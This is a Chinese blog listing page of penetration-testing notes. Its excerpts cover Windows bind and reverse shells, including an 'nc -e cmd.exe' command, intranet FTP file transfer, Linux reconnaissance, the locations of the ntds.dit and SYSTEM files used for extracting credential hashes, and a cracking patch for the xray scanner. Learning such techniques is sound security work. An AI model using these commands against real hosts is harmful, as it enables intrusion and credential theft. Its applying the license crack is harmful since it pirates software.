![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 74
渗透测试
三丁目の夕阳下的白菜
这个作者很懒,什么都没留下…
展开
-
【渗透笔记】windows反弹shell方法大全
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell): 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。ncnc正向shell被控端:nc -lvvp 6666 -e cmd.exe开启监听控制端:nc 192.168.1.62 6666此原理就是,被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得sh原创 2021-01-06 11:51:17 · 1889 阅读 · 0 评论 -
【渗透笔记】内网文件传输
WindowsFTPftp没有设置认证,允许匿名登录的话,攻击者如果知道了机器开启ftp协议,他可以直接登录机器。还有ftp要做一个比较好的目录权限控制,即使设置了账号密码,攻击者可以通过爆破,如果ftp目录有读取写入执行权限,攻击者会上传文件进而反弹shell。py开启ftp服务pip3 install pyftpdlibpython3 -m pyftpdlib脚本文件ftp.txt,用于连接ftp服务,下载文件copy con ftp.txtopen 192.168.1.111 21原创 2021-01-04 10:22:35 · 879 阅读 · 1 评论 -
【渗透笔记】Linux主机信息收集
系统架构# 打印系统信uname -a# 文件 /etc/issue是一个文本文件,其中包含要在登录提示之前打印的消息或系统标cat /etc/issue# /etc/lsb-release,/etc/redhat-release文件包含一个被解析以获取信息的描述行cat /etc/*-release# /proc/version指定了Linux内核的版本,用于编译内核的gcc的版本以及内核编译的时间。他还包含内核编译器的用户名cat /proc/version# /pr原创 2020-12-29 14:16:58 · 446 阅读 · 1 评论 -
【渗透笔记】域内密码凭证获取
Volume Shadow Copy活动目录数据库ntds.dit活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解sam文件和ntds.dit文件都需要拥有一个system文件ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.ditsystem文件位置:%SystemRoot%\System32\config\SYSTEMsa原创 2020-12-28 16:56:23 · 1688 阅读 · 0 评论 -
xray+burp扫描
xrayxray破解补丁,github上的被删除了,这是我之前下载的破解流程:# 生成证书main.exe -g zzzz# 破解main.exe -c xray.exe# 运行xrayxray.exe漏洞寻找:手工主动扫描(awvs等主动扫描工具)被动扫描(一般是自己手工探测流量或者利用爬虫获取流量进行扫描查找漏洞,借助xray,burp,awvs13等被动扫描工具+手工测试)开启xray被动扫描xray.exe webscan --listen 127.0.0.1:原创 2020-12-21 13:59:57 · 537 阅读 · 0 评论